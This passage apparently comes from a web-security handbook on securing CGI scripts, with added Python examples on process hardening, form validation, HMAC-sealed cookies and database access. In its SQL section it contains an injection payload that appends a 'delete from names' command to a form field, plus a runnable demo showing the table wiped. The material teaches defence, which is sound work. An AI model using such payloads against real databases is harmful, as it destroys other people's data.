Web-based scripting languages were the third technique developed for adding programmatic functionality to web pages. These systems allow developers to place small programs, usually called scripts, directly into the web page. An interpreter embedded in the web server runs the program contained on the web page before the resulting page is sent to the web browser. Embedded scripts tend to be quite fast. Microsoft's ASP, PHP, server-side JavaScript, and mod_perl are all examples of embedded scripting languages.

Embedded web server

Finally, some systems do away with the web server completely and embed their own HTTP server into the web application itself.
Largely as a result of their power, the extension techniques enumerated here can completely compromise the security of your web server and the host on which it is running. That's because potentially any program can be run through these interfaces. This includes programs that have security problems, programs that give outsiders access to your computer, and even programs that change or erase critical files on your system.

Two techniques can limit the damage that can be caused by web applications:

· The programs themselves should be designed and inspected to ensure that they can perform only the desired functions.

· The programs should be run in a restricted environment. If these programs can be subverted by an attacker to do something unexpected, the damage that they could do will be limited.

On operating systems that allow for multiple users running at multiple authorization levels, web servers are normally run under a restricted account, usually the nobody or the httpd user. Programs that are spawned from the web server through either CGI or API interfaces are then run as the same restricted user.[234] Unfortunately, other operating systems do not have the same notion of restricted users. On Windows 3.1, Windows 95/98/ME, and the Mac OS 7-9 operating systems prior to Mac OS X, there is no easy way for the operating system to restrict the reach of a CGI program.

Programs That Should Not Be CGIs

Interpreters, shells, scripting engines, and other extensible programs should never appear in a CGI scripting directory (e.g. cgi-bin), nor should they be located elsewhere on a computer where they might be invoked by a request to the web server process. Programs that are installed in this way allow attackers to run any program they wish on your computer.

[234] In a multiuser environment, such as a web server at an ISP or a university, it is common practice to use the cgiwrap script so that CGI programs are run with the author's permissions, rather than with the web server's.
For example, on Windows-based systems the Perl executable PERL.EXE should never appear in the CGI script directory. It is easy to probe a computer to see if it has been improperly configured. To make matters worse, some search engines can be used to find vulnerable machines automatically. Unfortunately, many Windows-based web servers have been configured this way because it makes it easier to set up Perl scripts on these servers.

Another source of concern is programs or scripts that are distributed with web servers and later found to have security flaws. Because webmasters rarely delete programs that are part of the default installation (it can be quite difficult to find out if a script is in use or not), these dangerous programs and scripts may persist for months or even years, even if new versions of the web server are installed that do not contain the bug. To protect yourself from programs, scripts, and CGIs in which security faults may later be discovered, move all of the programs that are installed by default with your web server into a directory where they cannot be accessed, and only restore the programs when they are specifically needed.

Unintended Side Effects

Security problems in scripts can remain dormant for years before they are exploited. Sometimes, obscure security holes may even be inserted by the programmer who first wrote the scripts: a sort of "back door" that allows the programmer to gain access in the future, should the programmer's legitimate means of access be lost. In other cases, the security hole is the result of an unintended side effect of the script. Unintended side effects can often be prevented by distrusting any input that comes from outside of the program: from a user's entries in a web form, from environment variables, from cookies, or anywhere else.
Any outside input should be filtered to extract only legal characters, and then checked to ensure that it is sensible. It's important to design filters that filter in a list of acceptable characters and reject all others, rather than rejecting a list of bad characters and accepting all others. The former approach is much more secure, as it can be difficult to anticipate all of the possible bad characters (and some characters that aren't bad now may one day become so!). For example, many older applications did not anticipate the possibility of Unicode characters. See chapter 16 of Garfinkel's Web Security, Privacy, and Commerce, 2nd Edition for more examples of unintended side effects.

General Principles for Writing Secure Scripts

The principles below represent the current best practices for writing secure scripts:

1. Carefully design the program before you start. Be certain that you understand what you are trying to build. Carefully consider the environment in which it will run, the input and output behavior, files used, arguments recognized, signals caught, and other aspects of behavior. List all of the errors that might occur, and how your program will deal with them. Write a code specification in English (or your native language) before writing the code in the computer language of your choice.

2. Show the specification to another person. Before you start writing code, show the specification that you have written to another programmer. Make sure they can understand the specification and that they think it will work. If you can't convince another programmer that your paper design will work, you should go back to the design phase and make your specification clearer. The time you spend now will be repaid many times over in the future.

3. Choose a scripting language that provides safety features for CGI scripting and that prevents buffer overflow errors. Perl, Python, and Ruby are good choices. C and C++ are generally a poor choice.
Never write CGI scripts for a shell interpreter like /bin/sh.

4. Whenever possible, reuse code. Don't write your own CGI library when you can use one that's already been debugged. But beware of reusing code that contains Trojan horses.

5. Write and test small sections at a time. As you start to write your program, start small and test frequently. When you test your sections, test them with both expected data and unexpected data. Where practical, functions should validate their arguments and perform reasonable actions (such as exiting with an error message or returning an error code) when presented with unreasonable data. A large number of security-related problems are simply bugs that have exploitable consequences. By writing code that is more reliable, you will also be writing code that is more secure.

6. Check all values provided by the user. An astonishing number of security-related bugs arise because an attacker sends an unexpected value or an unanticipated format to a program or a function within a program. A simple way to avoid these types of problems is by having your scripts always check and validate all of their arguments. Argument checking will not noticeably slow your scripts, but it will make them less susceptible to hostile users. As an added benefit, argument checking and error reporting will make the process of catching non-security-related bugs easier.

7. Check arguments that you pass to operating system functions. Even though your program is calling the system function, you should check the arguments to be sure that they are what you expect them to be. For example, if you think that your program is opening a file in the current directory, you might want to use the index() function in C or Perl to see if the filename contains a slash character (/). If the filename contains a slash, and it shouldn't, the program shouldn't open the file.

8. Check all return codes from system calls.
The POSIX programming specification (which is followed by both C and Perl) requires that every system call provide a return code. Even system calls that you think cannot fail, such as write(), chdir(), or chown(), can fail under exceptional circumstances and return appropriate return codes. When a call fails, check the errno variable to determine why it failed. Have your program log the unexpected value and then cleanly terminate if the system call fails for any unexpected reason. This approach will be a great help in tracking down both programming bugs and security problems later on.

9. Have internal consistency-checking code. If you think that a variable inside your program can only have the values 1, 2, or 3, check to ensure that it does, and generate an error condition if it does not. (You can do this easily using the assert macro if you are programming in C.)

10. Include lots of logging. You are usually better off having too much logging rather than too little. Rather than simply writing the results to standard error, and relying on your web server's log file, report your log information to a dedicated log file. It will make it easier for you to find the problems. Alternatively, consider using the syslog facility (under Unix), so that logs can be redirected to users or files, piped to programs, and/or sent to other machines.

11. Make the critical portion of your program as small and as simple as possible.

12. Always use full pathnames for any filename argument, for both commands and data files. Rather than depending on the current directory, set it yourself.

13. Be aware of race conditions. These can manifest as a deadlock or as the failure of two calls to execute in close sequence:

Deadlock conditions. Remember that more than one copy of your program may be running at the same time. Use file locking for any files that you modify. Provide a way to recover the locks in the event that the program crashes while a lock is held.
Avoid deadlocks or "deadly embraces," which can occur when one program attempts to lock file A and then file B, while another program already holds a lock for file B and then attempts to lock file A.

Sequence conditions. Be aware that your program does not execute atomically. That is, the program can be interrupted between any two operations to let another program run for a while, including one that is trying to abuse yours. Thus, check your code carefully for any pair of operations that might fail if arbitrary code is executed between them. In particular, when you are performing a series of operations on a file such as changing its owner, stating the file, or changing its mode, first open the file and then use the fchown(), fstat(), or fchmod() system calls. Doing so will prevent the file from being replaced while your program is running (a possible race condition). Also avoid the use of the access() function to determine your ability to access a file: using the access() function followed by an open() is a race condition, and almost always a bug.

14. Don't have your program dump core except during your testing. Core files can fill up a filesystem. Core files can contain confidential information. In some cases, an attacker can actually use the fact that a program dumps core to break into a system. Instead of dumping core, have your program log the appropriate problem and exit. Use the setrlimit() function to limit the size of the core file to 0.

15. Do not create files in world-writable directories. If your script needs to run as the nobody user, then have the directory in which it needs to create files owned by the nobody user. Give each script, or at the very least each subsystem, its own namespace for temporary files. (You can do this by giving each script its own directory for temporary files, or else by having each script prepend its temporary files with its own name.)
Do not store temporary files in the /tmp directory if the web server is also used as a general host for Unix shell activities.

16. Don't place undue reliance on the source IP address in the packets of connections you receive. Addresses may be forged, altered, or hijacked with proxy servers.

17. Include some form of load shedding or load limiting in your server to handle cases of excessive load. For example, you can have the script check the load and exit with a polite error message if the load is over 5. This will make it harder for an attacker to launch a denial-of-service attack against your server by repeatedly calling the same script. It will also protect your server from a failure mode if hundreds of users all hit the "reload" button on a slow-running script in an effort to make it run faster.

18. Put reasonable time-outs on the clock time used by your script while it is running. Your program may become blocked for any number of reasons; for example, a read request from a remote server may hang or the user's web browser may not accept information that you send to it. An easy technique to solve both of these problems is to put hard limits on the amount of real time that your CGI script can use. Once it uses more than its allotted amount of real time, it should clean up and exit. Most modern systems support some call to set such a limit.

19. Put reasonable limits on the CPU time used by your CGI script while it is running. A bug in your CGI script may put it in an infinite loop. To protect your users and your server against this possibility, you should place a hard limit on the total amount of CPU time that the CGI script can consume.

20. Do not require the user to send a reusable password in plaintext over the network connection to authenticate herself. If you use usernames and passwords, use a cryptographically enabled web server so that the password is not sent in plaintext. Alternatively, use client-side certificates to provide authentication.
If your users access an Internet Information Server web server through Internet Explorer, then you can use the NT challenge/response (NTLM), a Microsoft proprietary modification to the HTTP protocol. Finally, you can use HTTP Digest Authentication, which has an MD5 MAC to verify a shared password between the web server and the web browser. Apache 2.0 and above support Digest-based authentication with the mod_auth_digest module; support in many browsers is increasing. The primary disadvantage of digest authentication is that it requires the web server to maintain an essentially unencrypted copy of each user's password. For details on digest authentication, search for the AuthDigestFile directive in the Apache documentation, or look at http://www.apache.org/docs-2.0/mod/mod_auth_digest.html.

21. Read through your code. Think of how you might attack it yourself. What happens if the program gets unexpected input? What happens if you are able to delay the program between two system calls? Remember, most security flaws are actually programming faults. In a way, this is good news for programmers. When you make your program more secure, you'll simultaneously be making it more reliable.

Securely Using Fields, Hidden Fields, and Cookies

One of the reasons that it can be difficult to develop secure web applications has to do with the very architecture of web applications. When you develop an application, you generally write a body of code that runs locally on the web server and a much smaller body of code that is downloaded and run remotely on the user's web browser. You might spend a lot of time making sure that these two code bases work properly together. For example, it's very important to make sure that the field names downloaded in web forms exactly match the field names that server-side scripts are expecting.
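The runtime side of the checklist above (items 7, 8, 12 to 15 and 17 to 19) as a CGI script skeleton in Python. This is an added example, not code from the Handbook; the log file, spool directory, load threshold and time limits are hypothetical settings for a fictional order-taking script.

```python
"""CGI runtime hardening: no core dumps, CPU and wall-clock limits, load
shedding, a chosen working directory, allow-listed filenames, and
descriptor-based file operations instead of access()+open().
Added example; paths and limits are hypothetical."""
import errno
import logging
import os
import re
import resource
import signal
import stat
import tempfile

LOG_FILE = "/var/log/cgi/orders.log"   # hypothetical dedicated log (item 10)
SPOOL_DIR = "/var/spool/orders"        # hypothetical, owned by the web server user, not /tmp (item 15)
MAX_LOAD = 5.0                          # item 17: shed load above this 1-minute average
MAX_WALL_SECONDS = 20                   # item 18
MAX_CPU_SECONDS = 5                     # item 19

# Item 7: filenames are accepted only if every character is on this allow-list,
# so a slash (or a leading dot) can never reach open().
SAFE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,63}$")

log = logging.getLogger("orders")


class Timeout(Exception):
    pass


def _on_alarm(signum, frame):
    raise Timeout("wall-clock limit of %d s exceeded" % MAX_WALL_SECONDS)


def harden_process(spool_dir=SPOOL_DIR, log_file=LOG_FILE):
    """Apply the limits once at script start-up."""
    logging.basicConfig(filename=log_file, level=logging.INFO,
                        format="%(asctime)s %(process)d %(levelname)s %(message)s")
    resource.setrlimit(resource.RLIMIT_CORE, (0, 0))                        # item 14
    resource.setrlimit(resource.RLIMIT_CPU, (MAX_CPU_SECONDS, MAX_CPU_SECONDS))  # item 19
    signal.signal(signal.SIGALRM, _on_alarm)                                # item 18
    signal.alarm(MAX_WALL_SECONDS)
    os.chdir(spool_dir)                                                      # item 12


def current_load():
    return os.getloadavg()[0]


def overloaded(load_now, limit=MAX_LOAD):
    """Item 17: True when the script should exit with a polite error instead of running."""
    return load_now > limit


def safe_filename(name):
    """Item 7: the name itself if it passes the allow-list, otherwise None."""
    return name if SAFE_NAME.match(name) else None


def write_spool_file(directory, name, data):
    """Items 13 and 15: create the file exclusively, then work on the open
    descriptor (fstat/fchmod) rather than re-checking the path."""
    clean = safe_filename(name)
    if clean is None:
        log.warning("rejected filename %r", name)
        raise ValueError("bad filename")
    path = os.path.join(directory, clean)
    flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL | getattr(os, "O_NOFOLLOW", 0)
    try:
        fd = os.open(path, flags, 0o600)
    except OSError as exc:
        # Item 8: log the unexpected errno and stop rather than guessing.
        log.error("open(%s) failed: %s", path, errno.errorcode.get(exc.errno, exc.errno))
        raise
    try:
        st = os.fstat(fd)
        if not stat.S_ISREG(st.st_mode) or st.st_nlink != 1:
            raise RuntimeError("spool file was replaced while open")
        os.fchmod(fd, 0o600)
        os.write(fd, data)
    finally:
        os.close(fd)
    return path


def make_private_dir():
    """Helper for stand-alone runs: a fresh mode-0700 directory to spool into."""
    return tempfile.mkdtemp(prefix="orders-")


if __name__ == "__main__":
    spool = make_private_dir()
    harden_process(spool, os.path.join(spool, "orders.log"))
    if overloaded(current_load()):
        print("Status: 503 Service Unavailable\n\nServer busy, please retry.")
    else:
        print("wrote", write_spool_file(spool, "order-1.txt", b"widget x2"))
```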
And you will probably spend time making sure that the HTML forms, JavaScript, and other code that is downloaded to the browser works properly on a wide range of different browser programs. Even in the best of times, it can be difficult to get software on the web browser and the web server to properly synchronize and interoperate.

What makes this whole process difficult from the security perspective is that attackers, by definition, don't play by the rules. Sure, they can run your HTML forms and JavaScript in well-behaved browsers, but they can also pick apart the code, analyze it, and send completely made-up responses back to your web server. These sorts of attacks are difficult to detect because they are very hard for normal web developers to test against; after all, most web developers don't have a stable of CGI-script attack tools.

There is nothing inherently wrong with storing this information on the web browser instead of the web server; indeed, storing this information on the browser eliminates the need for a backend database, user tracking, and a lot of other technology. But if you store information on the user's web browser, you must validate this information when it is passed back to the web server to make sure that it has not been modified.

Many programmers do not realize the need to validate information returned from the web browser to the server. For example, in December 1999 engineers at Internet Security Systems (ISS) discovered that many e-commerce scripts from different vendors all shared a common vulnerability: they maintained the shopping cart, complete with the price for each item, on the user's web browser without using any form of validation.[235] When an invoice was prepared and a credit card charged, they blindly trusted the prices provided by the shopping carts. Thus, any attacker who wanted to give himself a discount could simply go shopping, save the server's HTML onto his hard drive, edit the prices, and then click on the "Buy" button.
In a Spring 2001 study,[236] four MIT graduate students discovered that many e-commerce sites did not properly validate the information in cookies. As a result, they were able to make subtle modifications in the cookies at e-commerce sites and gain access to unauthorized information.

Using Fields Securely

When checking arguments in your program, pay special attention to the following:

· Filter the contents of every field, selecting the characters that are appropriate for each response. For example, if a field is supposed to be a credit card number, select out the characters 0-9 and leave all other characters behind. This will also allow people to enter their credit card numbers with spaces or dashes.

· After you filter, check the length of every argument. If the length is incorrect, do not proceed, but instead generate an error.

· If you use a selection list, make certain that the value provided by the user was one of the legal values. Attackers can provide any value that they wish: they are not constrained by the allowable values in the selection list.

· Even if your forms use JavaScript to validate the contents of a form before it is submitted, be sure that you revalidate the contents on the server. An attacker can easily turn off JavaScript or bypass it entirely.

Hidden Fields and Compound URLs

A hidden field is a field that the web server sends to the web browser that is not displayed on the user's web page. Instead, the field merely sits in the browser's memory. When the form on the page is sent back to the server, the field and its contents are sent back.

[235] ISS reported the security problem to the 11 vendors in December 1999, then released the information about the vulnerability to the press in February 2000. For further information, see http://www.cnn.com/2000/TECH/computing/02/04/shop.glitch.idg/.

[236] See "Dos and Don'ts of Client Authentication on the Web," USENIX and MIT Technical Report 818, by Kevin Fu, Emil Sit, Kendra Smith, and Nick Feamster.
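The four field checks listed under "Using Fields Securely", applied server-side to a constructed order form in Python. This is an added example, not code from the Handbook; the field names, the shipping list and the length bounds are assumptions, and the Luhn checksum is used as the "sensible" check for the filtered card number.

```python
"""Server-side validation of form fields: filter in an allow-list of
characters, then check length, then check the value makes sense; and check
selection-list values against the server's own list, never the browser's.
Added example; the form fields are constructed for the demonstration."""
import re

# The server's copy of the <select> options; the browser's list is no constraint.
SHIPPING_METHODS = {"ground", "air", "pickup"}

# Allow-lists expressed as "everything that is NOT on the list", to be deleted.
NOT_DIGITS = re.compile(r"[^0-9]")
NOT_NAME_CHARS = re.compile(r"[^A-Za-z .'-]")


def filter_digits(raw):
    """Keep 0-9 and drop everything else, so spaces and dashes are tolerated."""
    return NOT_DIGITS.sub("", raw)


def luhn_ok(digits):
    """Mod-10 checksum that every real card number satisfies (the 'sensible' check)."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:          # double every second digit from the right
            d = d * 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def card_number(raw):
    """Filter first, then length, then sanity; fail closed on any problem."""
    digits = filter_digits(raw)
    if not 13 <= len(digits) <= 19:
        raise ValueError("card number has wrong length")
    if not luhn_ok(digits):
        raise ValueError("card number fails checksum")
    return digits


def customer_name(raw, max_len=64):
    """Letters, space, period, apostrophe and hyphen only; 1..max_len characters."""
    clean = NOT_NAME_CHARS.sub("", raw).strip()
    if not 1 <= len(clean) <= max_len:
        raise ValueError("name has wrong length")
    return clean


def shipping_method(raw):
    """Exact membership in the server-side list, not just 'looks plausible'."""
    if raw not in SHIPPING_METHODS:
        raise ValueError("unknown shipping method")
    return raw


def validate_order(form):
    """Validate every field of a submitted form (a dict of str); any failure
    raises ValueError and the whole submission is rejected."""
    return {
        "name": customer_name(form.get("name", "")),
        "card": card_number(form.get("card", "")),
        "shipping": shipping_method(form.get("shipping", "")),
    }
```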
Some web developers use hidden fields to store information that is used for session tracking on e-commerce systems. For example, instead of using HTTP Basic Authentication, developers sometimes embed the username and password provided by the user as hidden fields in all future form entries:

Hidden fields can also be used to implement a shopping cart:

Instead of embedding this information in hidden fields, it can be placed directly in the URL. These URLs will then be interpreted as if they were forms that were posted using the HTTP GET protocol. For example, this URL embeds a username and password:

http://www.vineyard.net/cgi-bin/password_tester?username=simsong&password=myauth11

It's quite easy to use hidden fields. Little or no information needs to be stored on the server. And unlike cookies, which are limited to 4096 bytes, hidden fields can be practically any length whatsoever. There are problems with using hidden fields in this way, however:

· If the user presses the "Back" button, items may be removed from the shopping cart. Sometimes this is the desired behavior, but usually it is not.

· HTML pages used by one person might be viewed by other people, possibly because the computer is shared. In this circumstance, the first user's username, password, or shopping cart contents might be disclosed.

· If you use URLs to embed information, the complete URL, including the embedded information, will be stored in the web server's log files. The full URL may also be passed by the user's browser in the referrer [sic] header when the user accesses another web server. This may compromise the user's privacy and/or security.

· In the vast majority of cases, the contents of the hidden field received by the web server are identical to what was originally provided. But there is no guarantee.
An attacker can save your HTML to a file, analyze the form, and issue his own HTTP GET or POST command with whatever contents he desires. An attacker can also submit the same web page over and over, with slight modifications, probing for vulnerabilities. There is no way to stop this sort of behavior, so you must defend against it.

· If the HTTP connection is not SSL-encrypted, an attacker who can intercept the data may gain access to authentication credentials or other sensitive information.

Using Cookies

One attractive alternative to using hidden fields or URLs is to store information such as usernames, passwords, shopping cart contents, and so on, in HTTP cookies. Users can modify their cookies, so cookies used for user tracking, shopping carts, and other types of e-commerce applications have all of the same problems described for hidden fields or compound URLs. But cookies also have problems all their own, including:

· Old cookies may continue to be used, even after they have "expired."

· Users may make long-term copies of cookies that are supposed to remain ephemeral and not ever be copied onto a hard drive.

· Some users are suspicious of cookies and simply turn off the feature.

Using Cryptography to Strengthen Hidden Fields, Compound URLs, and Cookies

Many of the problems discussed above can be solved by using cryptography to protect the information in hidden fields, compound URLs, and cookies. Cryptography can:

· Prevent users from understanding the information stored on their computer.

· Allow web server applications to detect unauthorized or accidental changes to this information.

Here are examples from the previous sections, recoded to use cryptography.
Username and password authentication:

A secure shopping cart:

A compound URL:

http://www.vineyard.net/cgi-bin/password_tester?p6e6J6FwQOk0tqLFTFYq5EXR03GQ1wYWG0ZsVnk09yv7ItIHG17ymls4UM%2F1bwHygRhp7ECawzUm%0AKl3Q%2BKRYhlmGILFtbde8%0A

In each of these cases, the individual human-readable variables have been replaced with a cryptographic block of information. This block is created with the following procedure:

1. Take the individual variables that need to be preserved and encode them as a string. This is called marshalling.

2. Prepend a 4-byte timestamp to these variables. The timestamp protects against replay attacks.

3. Compress the data. This saves space.

4. Prepend the length of the string to the data. This is required for decryption with a block cipher.

5. Encrypt the string using a symmetric encryption function with a secret key.

6. Calculate an HMAC function of this encrypted string and prepend it to the encrypted string. The HMAC protects all encrypted, compressed, and marshalled data.

7. Encode the resulting string with Base64, then escape the non-URL characters and return the resulting string.

8. Use this escaped, Base64-encoded, encrypted, compressed string for hidden fields, compound URLs, and cookies.

To decode and validate this encrypted string, simply follow these steps in reverse:

1. Isolate the escaped, Base64-encoded, encrypted, compressed string from the hidden field, compound URL, or cookie.

2. Unescape the Base64 representation.

3. Remove the Base64 coding.

4. Verify the HMAC. If it doesn't verify, then the string has been tampered with. Report an error and return.

5. Decrypt the data.

6. Recover the length and use this to truncate the decrypted data to the original length. This step is needed because block encryption functions will append null bytes to data to pad it out to an even block.

7. Decompress the compressed data.

8. Recover the timestamp from the beginning of the uncompressed data. If the timestamp is too old, disregard.
9. Return the remaining data to the caller, which will decode all of the original variables from the string.

This looks tremendously complicated and computationally intensive, but in fact, it is quite easy to code up and can run very quickly, as MD5 and symmetric encryption functions are quite fast. There are also ready-made libraries for doing this, such as CGI::EncryptForm for Perl.

Connecting to Databases

It is common for a CGI program or script to connect to databases that are external to the web server. External databases can be used for many purposes, such as storing user preferences, implementing shopping carts, and even order processing. When the script runs, it opens a connection to the database, issues a query, gets the result, and then uses the result to formulate a response to the user. On some systems, a new database connection is created each time a new script is run. Other systems maintain a small number of persistent connections that are cached.

Database-backed web sites give a tremendous amount of power and flexibility to the web designer. Unfortunately, this approach can also reduce the overall security of the system: many security breaches have happened because an attacker was able to execute arbitrary SQL commands on the database server and view the results. If you deploy a database server to supplement your web site, it is important to be sure that the server is deployed and used securely.

Protect Account Information

Before the database server provides results to the script running on the web server, the server needs to authenticate the script to make sure it is authorized to access the information. Most databases use a simple username/password for account authentication, which means the script needs to have a valid username/password and present this information to the database server each time a request is issued.
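The encode and decode procedures for protected hidden fields, compound URLs and cookies (the numbered steps above) carried through in Python using only the standard library. This is an added example, not code from the Handbook or from CGI::EncryptForm; since the standard library has no block cipher, step 5 uses a counter-mode keystream derived with HMAC-SHA256 under a fresh random IV as a stand-in for AES, and the secret key, the query-string marshalling and the one-hour age limit are assumptions.

```python
"""Seal and open a block of form variables: marshal, timestamp, compress,
length-prefix, encrypt, HMAC, Base64, URL-escape; and the reverse, verifying
the HMAC before anything is decrypted. Added example; the key is constructed."""
import base64
import binascii
import hashlib
import hmac
import os
import struct
import time
import urllib.parse
import zlib

BLOCK = 16
MAX_AGE = 3600                       # decode step 8: reject blobs older than this (seconds)
SECRET = b"constructed-demo-key"     # hypothetical; use a random 32-byte key in production


def _keys(secret):
    # Distinct keys for encryption (step 5) and for the HMAC (step 6).
    return (hashlib.sha256(b"enc" + secret).digest(),
            hashlib.sha256(b"mac" + secret).digest())


def _keystream(key, iv, nblocks):
    # Stand-in for a block cipher in counter mode: block i = HMAC(key, iv || i)[:16].
    return b"".join(hmac.new(key, iv + struct.pack(">I", i), hashlib.sha256).digest()[:BLOCK]
                    for i in range(nblocks))


def _xor(data, stream):
    return bytes(a ^ b for a, b in zip(data, stream))


def marshal(fields):
    # Encode step 1: the variables as one string (here, a query string).
    return urllib.parse.urlencode(sorted(fields.items())).encode()


def unmarshal(data):
    return dict(urllib.parse.parse_qsl(data.decode(), keep_blank_values=True))


def seal(fields, secret=SECRET, now=None):
    """Encode steps 1-8; returns the escaped, Base64-encoded string."""
    enc_key, mac_key = _keys(secret)
    stamped = struct.pack(">I", int(now or time.time())) + marshal(fields)   # step 2
    packed = zlib.compress(stamped)                                          # step 3
    padded = struct.pack(">I", len(packed)) + packed                         # step 4
    padded += b"\0" * (-len(padded) % BLOCK)                                 # null-pad to a block
    iv = os.urandom(BLOCK)
    body = iv + _xor(padded, _keystream(enc_key, iv, len(padded) // BLOCK))  # step 5
    tag = hmac.new(mac_key, body, hashlib.sha256).digest()                   # step 6 (prepended)
    return urllib.parse.quote(base64.b64encode(tag + body), safe="")         # steps 7-8


def open_sealed(token, secret=SECRET, now=None, max_age=MAX_AGE):
    """Decode steps 1-9; returns the fields, or None if the token fails
    the HMAC, is malformed, or is too old."""
    enc_key, mac_key = _keys(secret)
    try:
        raw = base64.b64decode(urllib.parse.unquote(token))                  # steps 2-3
    except (binascii.Error, ValueError):
        return None
    tag, body = raw[:32], raw[32:]
    if len(body) < 2 * BLOCK or len(body) % BLOCK:
        return None
    if not hmac.compare_digest(tag, hmac.new(mac_key, body, hashlib.sha256).digest()):
        return None                                                          # step 4: tampered
    iv, ct = body[:BLOCK], body[BLOCK:]
    padded = _xor(ct, _keystream(enc_key, iv, len(ct) // BLOCK))             # step 5
    (length,) = struct.unpack(">I", padded[:4])
    packed = padded[4:4 + length]                                            # step 6: drop padding
    try:
        stamped = zlib.decompress(packed)                                    # step 7
    except zlib.error:
        return None
    (stamp,) = struct.unpack(">I", stamped[:4])                              # step 8
    if (now or time.time()) - stamp > max_age:
        return None
    return unmarshal(stamped[4:])                                            # step 9
```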
Among many developers it is common practice to simply code the username and password into the scripts that require access to the database server. Unfortunately, this practice has several problems:

· If an attacker is able to view the script, the attacker will learn the username and password.

· If many scripts require access to the username and password, then it must be stored in several scripts.

· Changing the username and password requires modifying the script. When the script is modified, other changes may be made inadvertently.

Instead of storing the database username and password in the script, a better approach is to store this information in a file on the web server. This approach isolates the authentication information from the script that is performing the database request, which improves both maintainability and security. The server script then opens this file and reads the username and password prior to issuing a database request. Remember that if the database server is not on the same host as the web server, those usernames and passwords will be transmitted over the network between the hosts. Be sure to use a database that allows for encrypted remote connections or another form of authentication that does not transmit cleartext passwords.

Use Filtering and Quoting to Screen Out Raw SQL

As we mentioned earlier, it is extremely important to filter all data from the user to make sure that it contains only allowable characters. When working with SQL servers, it is further important to properly quote data provided by the user before sending the data to the server. These procedures are used to prevent users from constructing their own SQL commands and sending that data to the SQL server.
Consider a web form that asks a person for his name and then stores this information in a database. It might be tempting to simply take the person's name from a field, put it into a variable called $name, and then construct a SQL command using this variable. Consider this Perl snippet:

    $name = param('name');
    sql_send("insert into names (name) values ('$name');");

Unfortunately, this is not safe: an attacker who has knowledge of your application can provide a specially crafted name that results in arbitrary SQL commands being executed. Consider this name:

    John Smith'); delete from names;

When this name is used to build the SQL command, the resultant string will actually be interpreted as three commands: one that makes an insertion into the database, a second that deletes all of the data in the names table, and a third that contains a syntax error:

    insert into names (name) values ('John Smith'); delete from names; ');

Given this text, most SQL servers will insert a record into the names table, delete all of the data, and then report a SQL error. (Some database interfaces refuse to execute more than one statement per call, which defeats this particular payload, but the attacker still controls the text of the query, so that is not a defense.)

The way to protect scripts from these kinds of attacks is to make sure that you first carefully filter incoming data, and that you next quote all of the remaining data properly before sending it to the SQL server. Quoting is best done with a separate function that is always called whenever any string is sent to the SQL server. If you are using the Perl language and the DBI package, most of the database drivers provide a quote method on the database handle that performs such quoting. You use it like this:

    # $dbh is a DBI object that represents a handle to an open database connection
    $qname = $dbh->quote(param('name'));
    $dbh->do("insert into names (name) values ($qname)");

Note that quote escapes according to the rules of the database the handle is connected to and adds the surrounding quote marks itself, which is why $qname is not wrapped in quotes again in the SQL text.

Another approach is to precompile your SQL queries using variable binding. Variable binding allows you to precompile SQL queries with placeholders instead of actual variables.
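The same crafted name and both defenses, run end to end. This is an added example in Python over SQLite and not code from the Handbook (its own snippets are Perl/DBI); the table, the one pre-existing row and the helper names are constructed for the demonstration. executescript() is used for the string-built variants because, like the SQL servers described above, it runs every statement it finds in the string; sql_quote() mimics what DBI's $dbh->quote does for single quotes; insert_bound() is the placeholder form that the DBI examples below use.

```python
import sqlite3

# The crafted name from the text (constructed attacker input).
PAYLOAD = "John Smith'); delete from names;"


def fresh_db():
    """In-memory table with one real row, so a successful 'delete' is visible."""
    db = sqlite3.connect(":memory:")
    db.execute("create table names (id integer primary key, name text)")
    db.execute("insert into names (name) values ('Alice')")
    db.commit()
    return db


def insert_interpolated(db, name):
    """The unsafe pattern: user data pasted straight into the SQL text."""
    db.executescript(f"insert into names (name) values ('{name}');")


def sql_quote(value):
    """Minimal quote() in the spirit of DBI's $dbh->quote: wrap the value in
    single quotes and double any embedded single quote. Adequate for plain
    ASCII text; real drivers also handle NULL, backslashes and the
    database's character set, which is why you call the driver's own."""
    return "'" + value.replace("'", "''") + "'"


def insert_quoted(db, name):
    """String-built SQL, but with the value quoted first."""
    db.executescript(f"insert into names (name) values ({sql_quote(name)});")


def insert_bound(db, name):
    """Placeholder binding: the statement is compiled with a '?' and the
    value is handed over separately, so it is never parsed as SQL."""
    db.execute("insert into names (name) values (?)", (name,))
    db.commit()


def run(insert_fn, name=PAYLOAD):
    """Apply one insert variant to a fresh table.

    Returns (names left in the table, error text or None)."""
    db = fresh_db()
    error = None
    try:
        insert_fn(db, name)
    except sqlite3.Error as exc:  # the trailing "');" is a syntax error
        error = str(exc)
    rows = [row[0] for row in db.execute("select name from names order by id")]
    return rows, error


if __name__ == "__main__":
    for variant in (insert_interpolated, insert_quoted, insert_bound):
        print(f"{variant.__name__:20s} -> {run(variant)}")
```

Running the file prints one line per variant: the interpolated insert leaves the table empty and then reports an error for the dangling "');", exactly the insert/delete/error sequence the text describes, while the quoted and bound inserts store the crafted name as an ordinary string next to "Alice". sqlite3's plain execute() would have refused the stacked statements outright ("You can only execute one statement at a time"); that is a useful driver-level backstop, not a substitute for binding.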
To return to our original example, you might compile the query using a hypothetical SQL interface that uses the @ sign as a placeholder for variables:

    $func = sql_compile("insert into names (name) values (@)");

You might then execute this query with some other hypothetical function:

    $name = param('name');
    sql_bind($func, 1, $name);   # bind the variable name to the first placeholder
    sql_exec($func);             # execute the bound statement

Using the DBI package, you would write it like this:

    # Insertion example
    $name = param('name');
    $dbh->do("insert into names (name) values (?)", undef, $name);

    # Selection example
    $id = param('id');
    $sth = $dbh->prepare("select * from names where id = ?");
    $sth->execute($id);

Different systems will have different syntaxes and APIs for compiling, binding, and executing SQL queries. Binding is preferable to quoting because the database never parses a bound value as SQL at all, whereas quoting must be done correctly for every string and for the dialect of every database you use.

Content Updating

How will your users update the web server's content? In the early days of the World Wide Web, most content was created live on web servers by programmers and developers using text (or HTML) editors. These days most content is created on desktop PCs and Macs and then uploaded to the web server. This upload is fundamentally a file transfer operation, and thus subject to eavesdropping. As discussed above, you should require users to use a secure file transfer system, such as scp, WebDAV over SSL, or insecure file transfer programs running over a virtual private network. In some cases, physical transfer by means of floppy disks or CD-ROMs may be preferable to any form of network transfer.

Securing Database Servers

